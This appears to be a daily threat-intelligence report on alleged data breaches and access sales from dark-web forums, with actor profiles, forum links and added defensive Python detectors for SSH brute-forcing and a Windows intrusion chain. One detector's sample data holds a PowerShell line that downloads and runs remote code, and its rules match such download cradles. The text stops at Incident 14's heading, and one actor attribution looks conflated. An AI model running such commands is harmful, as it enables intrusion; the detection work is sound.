I. Executive Summary
The past 24 hours have seen a significant volume of alleged cyber incidents, primarily focusing on data breaches and leaks across various sectors and geographies. These incidents highlight the persistent threat posed by financially motivated cybercriminals seeking to monetize sensitive information, as well as groups aiming for initial access to corporate and governmental networks. The compromised data ranges from extensive user databases containing personal and financial credentials to highly sensitive government and medical records. A notable trend is the continued exploitation of vulnerabilities for direct data exfiltration and the sale of access, indicating a robust underground market for illicitly obtained information. While many threat actors remain unprofiled in public intelligence, the patterns observed underscore the critical need for enhanced data protection, robust access controls, and continuous vigilance against evolving cybercriminal tactics.
II. Incident Overview
This section provides a structured summary of the cybersecurity incidents reported in the last 24 hours, offering a rapid overview of the day’s significant events.
Summary of Reported Incidents
The recent activity highlights a pervasive landscape of data breaches and leaks, with a strong emphasis on financial gain through the sale of compromised information. Incidents span diverse sectors, including supermarkets, e-commerce, government administration, healthcare, and financial services, affecting countries such as Spain, China, Indonesia, USA, Poland, Thailand, Argentina, Jordan, and Myanmar. The types of data exposed are highly sensitive, encompassing millions of user records, financial details, personal identification documents, and even medical histories. Additionally, several instances of initial access sales, including administrative panel access and SSH root access, indicate a market for network infiltration capabilities. Many of the identified threat actors appear to be financially motivated individuals or groups, with limited public profiling available for some, underscoring the fragmented nature of the cybercriminal ecosystem.
Key Table: Daily Incident Summary
For a quick reference, the table below summarizes the core details of the incidents analyzed in this report.
| Incident ID | Affected Organization/Sector | Type of Breach | Primary Threat Actor(s) | Key Impact |
|---|---|---|---|---|
| INC-001 | Mercadona (Hacendado) | Data Breach | WhiteCoat | 27M+ unique users’ names, emails, passwords |
| INC-002 | Barbiebox | Data Breach | Panda | Customer IDs, names, emails, phone numbers, payment/shipping addresses, order details |
| INC-003 | Dewan Perwakilan Rakyat Republik Indonesia | Data Breach | KalengKongGhuan | ID, province ID, name, place/date of birth, position, political faction, address |
| INC-004 | Indonesia Citizenship Data | Data Leak | TopiAx | 2.3 million citizenship records |
| INC-005 | Unidentified US Healthcare Provider | Data Breach | Ansgar | 100,000+ patient records (medications, SSNs, contact info, medical card records) |
| INC-006 | Unidentified US Woocommerce Shop | Initial Access | inb4 | Full WordPress admin access |
| INC-007 | USA Citizens | Data Leak | Sharkylik | Names, surnames, addresses, phone numbers, email addresses |
| INC-008 | U.S. Crypto Users | Data Leak | hagilo2748 | U.S. Crypto User database |
| INC-009 | Europe Database | Data Leak | Sharkylik | Gmail, names, surnames, phone numbers |
| INC-010 | Polish Consumers | Data Leak | decojo4605 | Polish consumer phone numbers |
| INC-011 | Various Servers | Initial Access | ValhalaNet | SSH Port 22 access with mixed root privileges |
| INC-012 | BUKALAPAK | Data Breach | DigitalGhost | Names, emails, usernames, passwords |
| INC-013 | Multinational Corp (US, UK) | Data Leak | G3TTY | 300 passports, driver’s licenses of employees |
| INC-014 | E-payment (Thailand) | Initial Access | NXBB.SEC | Access to e-payment system |
| INC-015 | Immigration Bureau Accommodation Notification System (Thailand) | Initial Access | NXBB.SEC | Access to immigration system |
| INC-016 | Agricultural Land Reform Office (Thailand) | Initial Access | NDT SEC | User IDs and Passwords |
| INC-017 | Zabbix (Telecom Company) | Initial Access | h4tr3dw0rld | Admin access to Zabbix panel (16,000+ active hosts) |
| INC-018 | Central Bank of the Argentine Republic | Data Breach | SPOA | 19M+ customer records (names, IDs, financial history, debt reports) |
| INC-019 | Indian Membership Card Website | Initial Access | gesss | Admin access to website |
| INC-020 | Individuals from Israel | Data Leak | DigitalGhost | Names, genders, emails, phone numbers, IP addresses, locations, professional affiliations |
| INC-021 | Ministry of Defense of the Republic of Indonesia | Data Breach | DigitalGhost | PII of civil servant selection participants (NIK, names, job roles, test locations) |
| INC-022 | LINE Bank | Data Breach | DigitalGhost | Account numbers, holder names, IFSC codes, phone numbers, email addresses |
| INC-023 | Ramkhamhaeng University | Data Leak | NDT SEC | 15 GB of data and documents |
| INC-024 | YPT | Data Leak | adhuc | User ID, email, mobile number, nickname |
| INC-025 | Jordan Kuwait Bank | Data Breach | Everest | 1,003 employee personal records, 11.7 GB internal/confidential data |
| INC-026 | Innwa Bank | Data Breach | ClayOxtymus1337 | 46MB of compressed files from military-owned bank |
| INC-027 | AT&T | Data Breach | wht | 73M+ records (names, phone numbers, SSNs, dates of birth, emails, addresses) |
III. Detailed Incident Analysis and Threat Actor Profiles
This section provides an in-depth analysis of each reported incident, coupled with comprehensive profiles of the associated threat actors, detailing their motivations, tactics, techniques, and historical activities where information is available.
Incident 1: Alleged sale of Hacendado Data via Third-Party Vendor
Incident Details: A threat actor, identified as “WhiteCoat,” claims to be selling over 27,000,000 unique user records allegedly compromised from Hacendado, a brand distributed by Mercadona, a major supermarket chain in Spain. The data reportedly includes sensitive information such as names, email addresses, and passwords. The actor asserts that the breach occurred through a zero-day vulnerability in a third-party vendor, indicating a supply chain attack vector. This incident highlights the significant risk posed by third-party dependencies, where vulnerabilities in external systems can lead to massive data compromises for primary organizations.
Associated Threat Actor(s) Profile: WhiteCoat
Identity and Aliases: Based on the available research material, there is no specific profile or known aliases for a cyber threat actor named “WhiteCoat” [1]. The term “White Coat” in general cybersecurity context often refers to “white hat” hackers or ethical security researchers, or in a medical context to “white coat hypertension” [2]. Given the nature of this incident (selling stolen data), it is highly probable that “WhiteCoat” is either a self-assigned moniker for a financially motivated individual or a lesser-known group, for whom public threat intelligence is not readily available.
Motivation and Objectives: The explicit claim of “selling data” points to a clear financial motivation. The objective is to monetize the large volume of compromised user data, likely through direct sale on underground forums for use in credential stuffing attacks, phishing campaigns, or identity theft.
Tactics, Techniques, and Procedures (TTPs): The threat actor claims the breach was achieved via a “0day in 3rd Party Vendor,” suggesting exploitation of a previously unknown or unpatched vulnerability in a supplier’s system. This indicates a focus on supply chain attacks, which can be highly effective in bypassing the direct defenses of a target organization by compromising a less secure partner.
Historical Context and Noteworthy Campaigns: Due to the lack of specific profiling for “WhiteCoat” in the provided research, no historical context or noteworthy campaigns can be attributed to this specific actor. The incident itself represents a significant data breach due to the volume of records claimed.
Relevant Links:
- Published URL: https://darkforums.st/Thread-LEAK-27M-USERS-%E2%80%94-Hacendado-Breach-via-0day-in-3rd-Party-Vendor
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/412d16bd-50ce-439b-8c3a-e05caab75840.png
Incident 2: Alleged Database Leak of Barbiebox
Incident Details: A threat actor named “Panda” claims to have leaked the entire database of Barbiebox, an e-commerce platform. The compromised data is extensive, reportedly including customer IDs, names, email addresses, phone numbers, payment and shipping addresses, order totals, payment methods, and tracking information. This type of comprehensive customer data is highly valuable on the black market for various fraudulent activities, including identity theft and targeted phishing.
Associated Threat Actor(s) Profile: Panda
Identity and Aliases: While “Panda” is a common term in cybersecurity, often associated with China-linked Advanced Persistent Threat (APT) groups like “Aquatic Panda” (also known as APT41, Winnti Group, Bronze University, Charcoal Typhoon, Earth Lusca, RedHotel, and FishMonger) [3], the incident listing simply records the name “Panda” without further context. The research material on “Aquatic Panda” describes a state-sponsored espionage group [3], which typically focuses on intelligence gathering rather than direct data sales from e-commerce sites. Therefore, without additional information, it is not possible to definitively link this “Panda” to the well-known “Aquatic Panda” APT group. It is more likely that “Panda” is a self-assigned moniker for a financially motivated individual or a distinct, less-profiled cybercriminal.
Motivation and Objectives: The motivation behind this incident is clearly financial, as the threat actor has “leaked the database,” implying an intent to sell or publicly expose the data to gain notoriety or profit. The comprehensive nature of the stolen customer data makes it highly marketable for various forms of fraud.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to breach Barbiebox and exfiltrate the database are not detailed in the provided information. However, the successful acquisition of such a broad range of customer data suggests a compromise of core database systems, potentially through web application vulnerabilities, SQL injection, or compromised credentials.
Historical Context and Noteworthy Campaigns: No specific historical context or noteworthy campaigns can be attributed to a threat actor solely identified as “Panda” in the provided research material, distinct from the state-sponsored “Aquatic Panda” group.
Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-ELITE-BARBIEBOX-COM-ORDER-DATABASE-%E2%80%93-FRESH-LOADED
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/c41ca3ec-2e56-4f76-8cc5-0c8cc6b24654.PNG
Incident 3: Alleged Database Leak of Dewan Perwakilan Rakyat Republik Indonesia
Incident Details: A threat actor named “KalengKongGhuan” claims to have leaked the database of the Dewan Perwakilan Rakyat Republik Indonesia (DPR RI), the House of Representatives of the Republic of Indonesia. The compromised data reportedly contains sensitive information about individuals, including their ID, province ID, name, place of birth, date of birth, position, political faction, address, and additional remarks. This type of data could be used for targeted phishing, social engineering, or political influence operations.
Associated Threat Actor(s) Profile: KalengKongGhuan
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “KalengKongGhuan” in the available research material. This suggests that “KalengKongGhuan” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation for leaking a government database could range from hacktivism (to expose information or protest) to financial gain (by selling the data to interested parties). Given the nature of the data (political affiliations, positions), it could also be used for intelligence gathering or influence operations.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs employed to breach the DPR RI database are not detailed. However, compromising a government entity’s database often involves exploiting web application vulnerabilities, network misconfigurations, or social engineering to gain initial access.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “KalengKongGhuan” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-Document-1-MILLION-DPR-RI-DATABASE-2025
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/2aefe0ff-58ed-4776-bd1a-3016a436b088.PNG
Incident 4: Alleged Leak of Indonesian Citizenship Data
Incident Details: A threat actor named “TopiAx” claims to have obtained and leaked 2.3 million records of Indonesian citizenship data. The content of this data is not explicitly detailed beyond its size and origin. Such a large-scale leak of citizenship data poses significant risks for identity theft, fraud, and potential state-level intelligence gathering.
Associated Threat Actor(s) Profile: TopiAx
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “TopiAx” in the available research material [5]. The source snippets discuss general TTPs and other threat actors, but do not provide information specific to “TopiAx.”
Motivation and Objectives: The motivation for leaking citizenship data is typically financial gain, as such data is highly sought after on illicit markets for identity fraud, creating fake documents, or for use by other malicious actors.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used by “TopiAx” to acquire this data are not detailed. However, large-scale data leaks often result from compromises of government databases, public sector systems, or third-party services holding citizen information. Threat actors commonly employ data exfiltration techniques to steal sensitive data and then leak it directly or sell it [6].
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “TopiAx” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-2-3-MILLIONS-INDONESIA-CITIZENSHIP-DATA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/bf9865dc-2725-4ffa-9702-14fe299de2c9.png
Incident 5: Alleged Database Sale of Unidentified Healthcare Company in USA
Incident Details: A threat actor named “Ansgar” is allegedly selling a full Oracle database from a U.S.-based dialysis healthcare provider with over $100 million in revenue. The compromised data is highly sensitive, reportedly including details on over 100,000 patients, covering medications, prescriptions, analyses, Social Security numbers, contact information, addresses, and complete medical card records. This incident underscores the high value of healthcare data on the black market and the severe privacy implications for affected individuals.
Associated Threat Actor(s) Profile: Ansgar
Identity and Aliases: “Ansgar” is identified as a threat actor involved in data exfiltration and sale. This actor was previously linked to the data breach of MediSecure, an Australian prescription services provider, where they also put stolen information up for sale on an underground forum [7]. There are no specific aliases provided for Ansgar in the available research.
Motivation and Objectives: Ansgar’s primary motivation is financial gain, achieved by selling highly sensitive stolen data on underground forums [7]. The objective is to monetize the exfiltrated information, which can be used for identity theft, medical fraud, or other illicit activities.
Tactics, Techniques, and Procedures (TTPs): The core TTP observed for Ansgar is large-scale data exfiltration, followed by attempts to monetize the data through sales on dark web forums [7]. While the specific initial access methods for this incident are not detailed, the ability to obtain a “full Oracle database” suggests a significant compromise of the victim’s core systems. Ansgar provided screenshots as proof of possession in a previous incident, a common tactic to validate claims to potential buyers [7].
Historical Context and Noteworthy Campaigns: Ansgar has been noted for the MediSecure data breach, where they claimed to possess 6.5 terabytes of files containing sensitive personal and medical information, which they attempted to sell for $50,000 [7]. This current incident involving a U.S. healthcare provider further solidifies Ansgar’s focus on the healthcare sector and data monetization.
Relevant Links:
- Published URL: https://ramp4u.io/threads/sell-full-medical-oracle-data-base.3163/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/8affc21e-d207-4a0f-b9cf-53f97b700d7e.png
Incident 6: Alleged Sale of Admin Access to an Unidentified Shop in USA
Incident Details: A threat actor named “inb4” claims to be selling unauthorized administrative access to a U.S.-based WooCommerce shop. The compromised WordPress installation reportedly allows full WordPress admin access, including the ability to install plugins. This type of access can be highly valuable for various malicious activities, such as injecting malware, redirecting traffic, stealing customer data, or defacing the website.
Associated Threat Actor(s) Profile: inb4
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “inb4” in the available research material [8]. The source snippets discuss general email attacks, corporate espionage, and North Korean operatives, but do not provide information specific to “inb4.”
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” unauthorized access. Initial access brokers (IABs) often sell such access to other cybercriminals who then conduct further malicious activities like data theft, ransomware deployment, or website defacement.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain admin access are not detailed. However, common methods for compromising WordPress sites include exploiting vulnerabilities in themes or plugins, brute-forcing weak credentials, or phishing campaigns targeting administrators. The sale of “full WordPress admin access” suggests a complete compromise of the administrative interface.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “inb4” based on the provided research.
Relevant Links:
- Published URL: https://forum.exploit.in/topic/260286/?tab=comments#comment-1571197
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/93200753-dd19-4832-9fc7-590b55c2547d.png
Incident 7: Alleged Data Leak of USA Citizens
Incident Details: A threat actor named “Sharkylik” claims to have leaked a database containing personal data of USA citizens. The exposed information includes names, surnames, addresses, phone numbers, and email addresses. This type of data is commonly used for targeted phishing, spam campaigns, and identity theft.
Associated Threat Actor(s) Profile: Sharkylik
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “Sharkylik” in the available research material [10]. The source snippet discusses “Shathak,” a different threat group. This suggests that “Sharkylik” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation for leaking citizen data is typically financial gain, as such information is valuable for various forms of fraud and illicit marketing.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Large-scale data leaks often result from compromises of government databases, public sector systems, or third-party services holding citizen information.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “Sharkylik” based on the provided research.
Relevant Links:
- Published URL: https://leakbase.la/threads/usa-data-base.39091/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/ed51c1a2-d350-4bb3-abdc-99beb7491a82.png
Incident 8: Alleged Leak of U.S. Crypto Users Database
Incident Details: A threat actor named “hagilo2748” claims to have leaked a database specifically targeting U.S. Crypto Users. The content of this database is not explicitly detailed beyond its target demographic. Such a leak could expose individuals to cryptocurrency theft, targeted phishing for wallet credentials, or other financial scams.
Associated Threat Actor(s) Profile: hagilo2748
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “hagilo2748” in the available research material. This suggests that “hagilo2748” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation is financial, aiming to exploit the value of cryptocurrency users’ data for direct theft or to facilitate other scams.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Compromising cryptocurrency user databases could involve exploiting vulnerabilities in crypto exchanges, wallet services, or related platforms.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “hagilo2748” based on the provided research.
Relevant Links:
- Published URL: https://leakbase.la/threads/usa-crypto-user-database.39089/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/e2874c35-cad2-4849-aafc-eeb567ec7e05.PNG
Incident 9: Alleged Data Leak of Europe Database
Incident Details: A threat actor named “Sharkylik” claims to have obtained and leaked a database pertaining to Europe. The compromised data reportedly contains Gmail addresses, names, surnames, and phone numbers. This broad dataset could be used for widespread spam, phishing campaigns, or targeted social engineering attacks across European countries.
Associated Threat Actor(s) Profile: Sharkylik
Identity and Aliases: As with Incident 7, there is no specific profile or known aliases for “Sharkylik” in the available research material [10].
Motivation and Objectives: The motivation for leaking this European database is likely financial, as personal contact information and email addresses are valuable for various illicit activities, including marketing scams, phishing, and identity verification bypasses.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Large-scale data leaks often result from compromises of online services, marketing databases, or other platforms holding personal information.
Historical Context and Noteworthy Campaigns: No additional historical context or noteworthy campaigns can be attributed to “Sharkylik” beyond the two incidents mentioned in this report.
Relevant Links:
- Published URL: https://leakbase.la/threads/europe-database.39090/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/c63973c0-ee85-49cc-aab5-889dd563b027.png
Incident 10: Alleged Data Leak of Polish Consumer Phone Numbers
Incident Details: A threat actor named “decojo4605” claims to have leaked a database consisting of Polish consumer phone numbers. While seemingly limited in scope to phone numbers, such a dataset can be highly valuable for targeted smishing (SMS phishing) campaigns, robocalls, or other forms of telemarketing fraud.
Associated Threat Actor(s) Profile: decojo4605
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “decojo4605” in the available research material. This suggests that “decojo4605” is likely a unique handle for an individual or a small, unprofiled group.
Motivation and Objectives: The motivation is financial, aiming to sell or use the phone number database for illicit marketing, scam calls, or smishing campaigns.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire this data are not detailed. Consumer phone number databases can be obtained through various means, including breaches of telecommunication companies, marketing firms, or data brokers.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “decojo4605” based on the provided research.
Relevant Links:
- Published URL: https://leakbase.la/threads/poland-consumer-phone-number-database.39088/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3b08a918-3ed7-466e-9240-066dfe0d7793.PNG
Incident 11: Alleged Sale of Various SSH Root Accesses
Incident Details: A threat actor named “ValhalaNet” claims to be selling SSH Port 22 access to various servers, with mixed levels of root privileges. SSH (Secure Shell) access, especially with root privileges, grants powerful control over compromised servers, allowing attackers to execute commands, transfer files, and potentially pivot to other systems within a network. This type of offering is typical of initial access brokers (IABs).
Associated Threat Actor(s) Profile: ValhalaNet
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “ValhalaNet” in the available research material. This suggests that “ValhalaNet” is likely a unique handle for an individual or a small, unprofiled group operating as an initial access broker.
Motivation and Objectives: The motivation is purely financial, as the threat actor is “selling” unauthorized access. Initial access brokers monetize their ability to gain footholds in networks, selling this access to other cybercriminals who may then deploy ransomware, exfiltrate data, or conduct other malicious activities.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to gain SSH root access are not detailed. Common methods include exploiting vulnerabilities in unpatched servers, brute-forcing SSH credentials, or compromising systems through other means (e.g., phishing) to obtain SSH keys or credentials.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “ValhalaNet” based on the provided research.
Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-1K-VALID-SSH-ROOT-ACCESS-MIXED
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/705e423b-895c-4e50-9ce2-277e9aa705b9.PNG
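The SSH brute-force and root-login methods described for Incident 11 lend themselves to a simple defender-side check. As an added example (not part of the original report), the Python below audits an sshd_config fragment for the two settings that make password-guessing of root possible and scans auth.log lines for the guessing-then-success pattern that precedes a sold "root access"; the config text, log lines, IP addresses and the five-failures-in-five-minutes threshold are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd_config fragment with the weak settings on purpose.
WEAK_SSHD_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

# Constructed sample auth.log lines: one source guesses root's password five
# times and then gets in; an unrelated key-based login follows.
SAMPLE_AUTH_LOG = """
Jun 14 03:12:01 web1 sshd[2231]: Failed password for root from 203.0.113.45 port 51122 ssh2
Jun 14 03:12:03 web1 sshd[2233]: Failed password for root from 203.0.113.45 port 51124 ssh2
Jun 14 03:12:05 web1 sshd[2235]: Failed password for invalid user admin from 203.0.113.45 port 51126 ssh2
Jun 14 03:12:08 web1 sshd[2237]: Failed password for root from 203.0.113.45 port 51130 ssh2
Jun 14 03:12:10 web1 sshd[2239]: Failed password for root from 203.0.113.45 port 51131 ssh2
Jun 14 03:12:14 web1 sshd[2241]: Accepted password for root from 203.0.113.45 port 51140 ssh2
Jun 14 03:20:00 web1 sshd[2300]: Accepted publickey for deploy from 198.51.100.7 port 40010 ssh2
"""

# Matches the classic syslog-format sshd "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def audit_sshd_config(text):
    """Return findings for sshd settings that make password-guessing of root possible."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        settings[parts[0].lower()] = parts[1].strip().lower() if len(parts) > 1 else ""
    findings = []
    # OpenSSH 7.0+ defaults to prohibit-password; older builds defaulted to yes.
    if settings.get("permitrootlogin", "prohibit-password") not in ("no", "prohibit-password", "without-password"):
        findings.append("PermitRootLogin permits password logins as root; set 'PermitRootLogin no'")
    if settings.get("passwordauthentication", "yes") != "no":
        findings.append("PasswordAuthentication is on; move to keys and set 'PasswordAuthentication no'")
    return findings


def parse_auth_line(line):
    """Parse one sshd auth line into a dict, or None for lines we do not care about."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{m['mon']} {int(m['day']):02d} {m['time']}", "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"], "user": m["user"], "ip": m["ip"]}


def detect_ssh_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Flag sources that fail >= threshold times inside `window`, and any login that
    succeeds from a source that had been failing (the moment the access becomes sellable)."""
    failures = defaultdict(list)  # source ip -> timestamps of recent failures
    reported = set()
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_auth_line(raw)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            recent = [t for t in failures[ip] if ev["ts"] - t <= window]  # sliding window
            recent.append(ev["ts"])
            failures[ip] = recent
            if len(recent) >= threshold and ip not in reported:
                reported.add(ip)
                alerts.append({"ip": ip, "kind": "bruteforce", "count": len(recent), "user": ev["user"]})
        elif failures[ip]:
            alerts.append({"ip": ip, "kind": "success_after_failures", "user": ev["user"], "method": ev["method"]})
        elif ev["user"] == "root":
            alerts.append({"ip": ip, "kind": "root_login", "user": "root", "method": ev["method"]})
    return alerts


if __name__ == "__main__":
    for finding in audit_sshd_config(WEAK_SSHD_CONFIG):
        print("CONFIG:", finding)
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print("ALERT:", alert)
```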
Incident 12: Alleged Data Breach of BUKALAPAK
Incident Details: A threat actor named “DigitalGhost” claims to have obtained data from BUKALAPAK, an Indonesian e-commerce company. The compromised data reportedly includes sensitive information such as names, email addresses, usernames, and passwords. This type of data is highly valuable for credential stuffing attacks and identity theft.
Associated Threat Actor(s) Profile: DigitalGhost
Identity and Aliases: “DigitalGhost” appears to be an alias for “GhostSec” or “Ghost actors,” a group with ties to the Anonymous collective that has shifted from hacktivism to financially motivated activities [11]. Other aliases associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture [12]. Ghost actors are reportedly located in China and conduct widespread attacks for financial gain [12].
Motivation and Objectives: The motivation is financial gain, as the group has shifted towards a “financially motivated cyber mafia organization” model [11]. The objective is to monetize the stolen data, likely through sale on underground forums.
Tactics, Techniques, and Procedures (TTPs): Ghost actors are known for exploiting publicly available code and well-known vulnerabilities in internet-facing servers, particularly those with outdated software or unapplied patches [12]. They often gain initial access by exploiting public-facing applications associated with multiple CVEs [12]. Once inside, they may upload web shells and use PowerShell or Command Prompt to download and execute malware like Cobalt Strike Beacon [12]. They also focus on defense evasion by disabling antivirus software like Windows Defender [12].
Historical Context and Noteworthy Campaigns: GhostSec has been active since at least 2015, initially participating in hacktivist initiatives like #opisis against ISIS [11]. In late July 2022, they announced a shift to a subscription-based premium channel, GhostSec Mafia Premium, to share exclusive content and leaks, marking their transition to financially motivated operations [11]. Since early 2021, Ghost actors have indiscriminately targeted networks with vulnerabilities across over 70 countries, including critical infrastructure, schools, healthcare, and government networks [12].
Relevant Links:
- Published URL: https://darkforums.st/Thread-BUKALAPAK-INDONESIA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/12e33a47-acbc-4fbf-8d38-1e4d7a434420.png
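The post-access chain attributed to Ghost actors in Incident 12 (web shell, PowerShell download-and-execute, Windows Defender disabled) is what a SOC would correlate on the endpoint. As an added example that is not part of the original report, the Python below classifies Windows event records into those three stages and raises one alert per host when two or more stages occur within an hour; the hostnames, timestamps, paths and URL are constructed, and the event-ID mapping (Security 4688 process creation, PowerShell 4104 script block, Defender Operational 5001 real-time protection disabled) is assumed from standard Windows logging.

```python
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Process names that should never be the parent of an interactive shell on a web host.
WEB_SERVER_PROCS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}
SHELL_PROCS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# A "download cradle" needs both a fetch verb and an in-memory execute verb.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)

# Constructed sample events (already flattened from EVTX/XML into dicts).
# iis-01 shows the full chain; hr-07 is a benign scheduled PowerShell run.
SAMPLE_EVENTS = [
    {"host": "iis-01", "ts": "2025-06-14T02:10:05", "channel": "Security", "id": 4688,
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"host": "iis-01", "ts": "2025-06-14T02:11:40", "channel": "Microsoft-Windows-PowerShell/Operational",
     "id": 4104, "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/stage.txt')"},
    {"host": "iis-01", "ts": "2025-06-14T02:12:30", "channel": "Microsoft-Windows-Windows Defender/Operational",
     "id": 5001, "message": "Microsoft Defender Antivirus Real-time Protection is disabled."},
    {"host": "hr-07", "ts": "2025-06-14T09:00:00", "channel": "Security", "id": 4688,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def classify_event(ev):
    """Map one event to a stage of the chain, or None if it is not interesting."""
    if ev["id"] == 4688 and ev["channel"] == "Security":
        # ntpath handles Windows paths correctly even when this runs on Linux.
        parent = ntpath.basename(ev.get("parent", "")).lower()
        child = ntpath.basename(ev.get("image", "")).lower()
        if parent in WEB_SERVER_PROCS and child in SHELL_PROCS:
            return "webshell_spawned_shell"
    elif ev["id"] == 4104 and "PowerShell" in ev["channel"]:
        script = ev.get("script", "")
        if DOWNLOAD_RE.search(script) and EXEC_RE.search(script):
            return "powershell_download_exec"
    elif ev["id"] == 5001 and "Windows Defender" in ev["channel"]:
        return "realtime_protection_disabled"
    return None


def correlate_intrusion_chain(events, window=timedelta(hours=1), min_stages=2):
    """Return one alert per host on which >= min_stages distinct stages fall inside `window`."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        stage = classify_event(ev)
        if stage:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))
    alerts = []
    for host, hits in by_host.items():
        for i, (t0, _) in enumerate(hits):
            # distinct stages seen from this hit until the window closes
            stages = sorted({s for t, s in hits[i:] if t - t0 <= window})
            if len(stages) >= min_stages:
                alerts.append({"host": host, "first_seen": t0.isoformat(), "stages": stages})
                break  # one alert per host is enough to open a case
    return alerts


if __name__ == "__main__":
    for alert in correlate_intrusion_chain(SAMPLE_EVENTS):
        print("ALERT:", alert)
```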
Incident 13: Alleged Leak of Passport and ID Cards Data from Multinational Corporation
Incident Details: A threat actor named “G3TTY” claims to be selling approximately 300 passports, driver’s licenses, and other identification documents belonging to employees of a multinational corporation, primarily from the U.S. and UK. The sale of such sensitive identification documents poses a severe risk for identity theft, fraud, and potentially even physical security threats to the individuals involved.
Associated Threat Actor(s) Profile: G3TTY
Identity and Aliases: There is no specific profile or known aliases for a cyber threat actor named “G3TTY” in the available research material [13]. The source snippets discuss the general challenge of inconsistent threat actor naming conventions and collaborative efforts to standardize them, but do not provide information specific to “G3TTY.”
Motivation and Objectives: The motivation is financial, as the threat actor is “selling” the leaked data. Identification documents are highly valuable on the black market for various forms of identity fraud, including opening fraudulent accounts, obtaining loans, or bypassing security checks.
Tactics, Techniques, and Procedures (TTPs): The specific TTPs used to acquire these documents are not detailed. Compromising a multinational corporation to obtain employee identification documents could involve sophisticated phishing campaigns, insider threats, or breaches of HR systems or document management platforms.
Historical Context and Noteworthy Campaigns: No historical context or noteworthy campaigns can be attributed to “G3TTY” based on the provided research.
Relevant Links:
- Published URL: https://forum.exploit.in/topic/260277/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/0bbabf2a-e276-4faa-8f71-f98e0ae9606e.png
Incident 14: Group Claims to Have Leaked Access to E-payment System (Thailand)
